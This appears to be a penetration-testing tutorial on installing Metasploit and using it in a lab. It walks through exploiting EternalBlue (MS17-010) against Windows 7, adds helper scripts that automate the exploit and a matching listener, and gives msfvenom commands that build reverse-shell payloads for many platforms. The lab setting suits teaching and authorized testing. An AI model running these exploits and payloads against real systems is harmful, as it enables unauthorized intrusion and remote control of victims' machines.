Intranet Security Series - 001 - MSF Installation and Upgrade

Metasploit

Metasploit Basics

Metasploit Framework (MSF) is an open-source penetration-testing framework that ships with thousands of modules for known software vulnerabilities and is updated continuously. It covers the whole penetration-testing workflow, from information gathering through vulnerability detection to exploitation and post-exploitation, which earned it the nickname "the tool that can hack the entire universe" in the security community. Early versions of Metasploit were written in Perl; the framework was later rewritten in Ruby. Kali Linux ships Metasploit out of the box. In what follows we use the well-known EternalBlue vulnerability (MS17-010) as the entry point for explaining how the framework is used.

Updating MSF: msfupdate

Installing and upgrading Metasploit

Most Linux distributions do not install MSF by default. The following installs the framework on a non-Kali Linux system (the transcript below is from a Debian/Ubuntu-style host that uses apt).

Installation steps:

Step 1: download the msfupdate.erb installer script and save it as msfinstall. The script is fetched from the master branch of the rapid7/metasploit-omnibus repository and will run as root, so read through it (in particular the apt repository and signing key it adds) before executing it in step 2.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >msfinstall


Step 2: make msfinstall executable and run it

chmod 755 msfinstall && ./msfinstall


root@iZ7xvdva5kuivb9u4oyw13Z:~/msf# chmod 755 msfinstall 
root@iZ7xvdva5kuivb9u4oyw13Z:~/msf# ./msfinstall
Adding metasploit-framework to your repository list..Updating package cache..OK
Checking for and installing update..
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
metasploit-framework
0 upgraded, 1 newly installed, 0 to remove and 7 not upgraded.
Need to get 365 MB of archives.
After this operation, 803 MB of additional disk space will be used.
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 6.4.25~20240831102604~1rapid7-1 [365 MB]
Fetched 365 MB in 55s (6,680 kB/s)
Selecting previously unselected package metasploit-framework.
(Reading database ... 127412 files and directories currently installed.)
Preparing to unpack .../metasploit-framework_6.4.25~20240831102604~1rapid7-1_amd64.deb ...
Unpacking metasploit-framework (6.4.25~20240831102604~1rapid7-1) ...
Setting up metasploit-framework (6.4.25~20240831102604~1rapid7-1) ...
update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode
Run msfconsole to get started

Step 3: add a user named msf

adduser msf   # create the msf user
su msf        # switch to the msf user


Step 4: change to the directory containing msfconsole and start it

cd /opt/metasploit-framework/bin   # directory containing the msf binaries
./msfconsole   # from now on always start msfconsole as the msf user: the first run initialises the bundled PostgreSQL database, and PostgreSQL's initdb refuses to run as root, so a root start leaves you without a working database


Step 5: upgrade msf

msfupdate


Summary of the commands:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >msfinstall && chmod 755 msfinstall && ./msfinstall
adduser msf   # create the msf user
su msf        # switch to the msf user
cd /opt/metasploit-framework/bin   # directory containing the msf binaries
./msfconsole   # from now on always start msfconsole as the msf user so the database is initialised and used; started as root it cannot set up the database

# msfconsole can also be put on the PATH so it can be started from any directory. The installer already did this through update-alternatives (see the "update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole" line in the output above), so the symlink below is only needed if /usr/bin/msfconsole is missing:
ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole
# Note:
# The first run of msfconsole creates the database. MSF uses a bundled PostgreSQL instance, and PostgreSQL's initdb refuses to run as root; that is the reason a separate msf user is created to run Metasploit. If you accidentally did the first run as root, run msfdb reinit as the msf user (it removes any half-initialised database and creates a fresh one), so that the database is initialised by a non-root user.
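The five steps above collected into one script, as an added example that is not part of the original post. It downloads the installer to a file instead of piping it into a shell, prints the lines that add a package source or signing key so they can be reviewed, refuses to continue unless the Rapid7 repository host seen in the install output (downloads.metasploit.com) is referenced, then creates the msf user and initialises the database as that user. The grep patterns, the user name and the RUN_MSF_INSTALL switch are assumptions of this example.

```shell
#!/bin/sh
# Added example (not the page's own script): the install procedure as a script
# that reviews the downloaded installer before running it, creates the
# unprivileged "msf" user and initialises the database as that user.
# Assumptions: URL and repository host are the ones shown in the page's output.

INSTALLER_URL="https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb"
REPO_HOST="downloads.metasploit.com"   # apt repository host seen in the install output
MSF_USER="msf"

# Download the installer to a file instead of piping it into sh, so it can be read first.
fetch_installer() {
    curl -fsSL "$INSTALLER_URL" -o "$1" && chmod 755 "$1"
}

# Print every line that adds a package source or a signing key, and fail unless
# the expected Rapid7 repository host appears: anything else means the script
# is not the one you think it is. (Patterns are an assumption of this example.)
review_installer() {
    grep -nE 'deb |apt-key|gpg' "$1" || true
    grep -q "$REPO_HOST" "$1"
}

# Create the unprivileged user only if it does not exist yet.
ensure_msf_user() {
    id "$1" >/dev/null 2>&1 || adduser --disabled-password --gecos "" "$1"
}

# PostgreSQL's initdb refuses to run as root, so the bundled database has to be
# initialised as the unprivileged user; msfdb status confirms it came up.
init_db_as() {
    su - "$1" -c "/opt/metasploit-framework/bin/msfdb init" \
      && su - "$1" -c "/opt/metasploit-framework/bin/msfdb status"
}

main() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root: the installer drives apt" >&2; return 1; }
    tmp=$(mktemp)
    fetch_installer "$tmp" || return 1
    review_installer "$tmp" || { echo "unexpected repository in installer, aborting" >&2; return 1; }
    "$tmp"                       # runs the apt install shown in the transcript above
    ensure_msf_user "$MSF_USER"
    init_db_as "$MSF_USER"
}

# Only run when explicitly asked, so the functions can be sourced and checked offline.
if [ "${RUN_MSF_INSTALL:-0}" = 1 ]; then
    main
fi
```

Run it with RUN_MSF_INSTALL=1 sh install_msf.sh as root; the review step prints the repository and key lines so you can compare them against what the transcript above shows before the package is installed.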

Later upgrades of MSF: msfupdate

How to use MSF

Lab environment:

Asset type   IP address          Source                   Role
Windows 7    192.168.244.134     itellyou                 target (victim)
Kali         192.168.244.130     official Kali download   attacker
msf6         installed on Kali   -                        attack tool


Usage steps:

  • Start the framework: msfconsole
  • Search for modules matching the vulnerability: search ms17-010
  • Select the module with use: use exploit/windows/smb/ms17_010_eternalblue
  • Show the module information: info
  • Set the payload: set payload windows/x64/meterpreter/reverse_tcp
  • List the options the module needs: show options
  • Set the options: set RHOSTS 192.168.244.134 (the Windows 7 target from the lab table; RHOST is accepted as an alias) and set LHOST 192.168.244.130 (the Kali address the reverse payload connects back to)
  • Launch the attack: exploit or run
  • Post-exploitation

The outputs of search ms17-010, info and show options, the result of run, and the Windows 7 side were shown as screenshots in the original post (not reproduced here).

The steps differ from attack to attack; they are not fixed, so apply them flexibly.

The attack commands can also be written into a resource file such as configure.rc (any file ending in .rc) and run automatically with msfconsole -r configure.rc.
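The walkthrough above as a resource script, added here as an example that is not from the original post. The shell function writes a .rc file that first runs the auxiliary/scanner/smb/smb_ms17_010 check against the target, then launches ms17_010_eternalblue with the x64 Meterpreter payload, and hands the file to msfconsole -r. The addresses are the lab values from the table above; the file name ms17_010.rc, the pre-check module, the IPv4 validation and the RUN_MS17 switch are my additions.

```shell
#!/bin/sh
# Added example (not the page's own): build a Metasploit resource script for
# the MS17-010 walkthrough and run it with msfconsole -r. Addresses are the
# page's lab values; file name and pre-check module are assumptions.

TARGET="192.168.244.134"    # Windows 7 victim from the lab table
ATTACKER="192.168.244.130"  # Kali box the reverse payload connects back to
LPORT="4444"

# Reject anything that is not a dotted quad with octets 0..255, so a typo
# never ends up as RHOSTS and fires an exploit at the wrong host.
valid_ipv4() {
    case "$1" in
        *[!0-9.]*|*..*|.*|*.|'') return 1 ;;
    esac
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Write the resource script: options set globally with setg so both modules
# see them, the harmless smb_ms17_010 check first, then the exploit as a job.
gen_ms17_rc() {
    rhosts=$1; lhost=$2; lport=$3; out=$4
    valid_ipv4 "$rhosts" && valid_ipv4 "$lhost" || return 1
    cat > "$out" <<EOF
setg RHOSTS $rhosts
setg LHOST $lhost
setg LPORT $lport
use auxiliary/scanner/smb/smb_ms17_010
run
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
exploit -j
EOF
}

# Only generate and launch when explicitly asked, so the functions can be checked offline.
if [ "${RUN_MS17:-0}" = 1 ]; then
    gen_ms17_rc "$TARGET" "$ATTACKER" "$LPORT" ms17_010.rc && msfconsole -q -r ms17_010.rc
fi
```

setg makes RHOSTS, LHOST and LPORT global, so the scanner and the exploit both pick them up without a second round of set after the second use; exploit -j runs the exploit as a background job, so once it finishes list the new session with sessions -l in the console. Keep the scanner in front: the check is cheap, and the exploit can crash a host that turns out not to be vulnerable.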

Generating shellcode with msfvenom

Basic generation

msfvenom -p <payload> -f <output format> -o <output file>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe -o payload.exe   # a reverse payload needs LHOST: without it msfvenom reports that the LHOST option failed to validate and generates nothing; LPORT defaults to 4444 if omitted

Generation with an encoder (encoders exist to strip bad characters from the shellcode; iterating x86/shikata_ga_nai is well signatured and is not a reliable way to evade antivirus)

msfvenom -a <arch> --platform <platform> -p <payload> lhost=<attacker IP> lport=<attacker port> -e <encoder> -i <iterations> -f <output format> -o <output file>
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

Common options

(base) kali@kali:~$ msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
(base) kali@kali:~$

msfvenom --list <type>, where the supported types are:

Type        Meaning
payloads    list all available payloads
encoders    list all encoders
nops        list all NOP generators (one per architecture or payload type)
platforms   list the supported platforms
archs       list the supported architectures
encrypt     list the encryption/encoding schemes usable with --encrypt
formats     list all output formats
all         list everything
(base) kali@kali:~$ msfvenom --list nops

Framework NOPs (11 total)
=========================

Name Description
---- -----------
aarch64/simple Simple NOP generator
armle/simple Simple NOP generator
cmd/generic Generates harmless padding for command payloads.
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator

Common output formats (for a reverse payload, append LHOST=<attacker IP> and LPORT=<attacker port> to each command below; they are left out here to keep the templates short)

Windows

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp -f exe -o payload.exe

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=4445 -f exe -o payload.exe
is equivalent to (option names are case-insensitive)
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4445 -f exe -o payload.exe

msfvenom --platform windows -a x64 -p windows/meterpreter/reverse_tcp LHOST=192.168.244.130 LPORT=4445 -f exe -o payload.exe
This command fails with: Error: The selected arch is incompatible with the payload
The cause is not the platform: windows/meterpreter/reverse_tcp is a 32-bit payload, so it cannot be built with -a x64. For a 64-bit target use the x64 variant, windows/x64/meterpreter/reverse_tcp, together with -a x64.
Worked case

Put MSF into listening mode:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp   # must match the payload given to msfvenom below; the handler's default payload cannot talk to a Meterpreter stager
set LHOST 192.168.244.130
set LPORT 4445
run


Generate the payload with msfvenom:

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.244.130 LPORT=4445 -f exe -o payload.exe


In the directory containing payload.exe, serve it over HTTP with:

python -m http.server 8080


On the Windows 7 target, download payload.exe from that HTTP server and double-click it.

On Kali, the incoming Meterpreter session then appears in msfconsole (shown as a screenshot in the original post).
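An added example, not from the original post, that ties together the two pitfalls above: the "selected arch is incompatible" error from the Windows section and the listener having to match what msfvenom generated. arch_for_payload derives the -a value from the payload path, and handler_cmd builds the msfconsole -x command line from the same payload, LHOST and LPORT variables that are passed to msfvenom, so generator and listener cannot drift apart. The lab address and port are the page's; the function names and the RUN_HANDLER switch are assumptions of this example.

```shell
#!/bin/sh
# Added example (not the page's own): derive msfvenom's -a value from the
# payload name and start a multi/handler that uses the same payload, LHOST and
# LPORT. Lab address and port are the page's; everything else is assumed.

LHOST="192.168.244.130"
LPORT="4445"

# Windows payloads carry their architecture in the module path: windows/x64/...
# is 64-bit, a bare windows/... is 32-bit. Passing the other -a value is what
# produces "The selected arch is incompatible with the payload".
arch_for_payload() {
    case "$1" in
        windows/x64/*) echo x64 ;;
        windows/*)     echo x86 ;;
        *)             return 1 ;;   # not a Windows payload: caller must decide
    esac
}

# The -x command string that makes the listener match the generated file.
handler_cmd() {
    printf 'use exploit/multi/handler; set payload %s; set LHOST %s; set LPORT %s; exploit -j' "$1" "$2" "$3"
}

# Generate the executable and start the matching listener in one go.
build_and_listen() {
    payload=$1; out=$2
    arch=$(arch_for_payload "$payload") || return 1
    msfvenom --platform windows -a "$arch" -p "$payload" \
        LHOST="$LHOST" LPORT="$LPORT" -f exe -o "$out" || return 1
    msfconsole -q -x "$(handler_cmd "$payload" "$LHOST" "$LPORT")"
}

# Only generate and listen when explicitly asked, so the helpers can be checked offline.
if [ "${RUN_HANDLER:-0}" = 1 ]; then
    build_and_listen windows/x64/meterpreter/reverse_tcp payload.exe
fi
```

exploit -j leaves the handler running as a background job, so the console stays usable for serving the file (python -m http.server 8080 as above) and for sessions -l once the target runs payload.exe.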

Linux

msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

Mac

msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

Android

msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

ASPX

msfvenom --platform windows -p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

PHP

msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php

Bash

msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

Python

msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py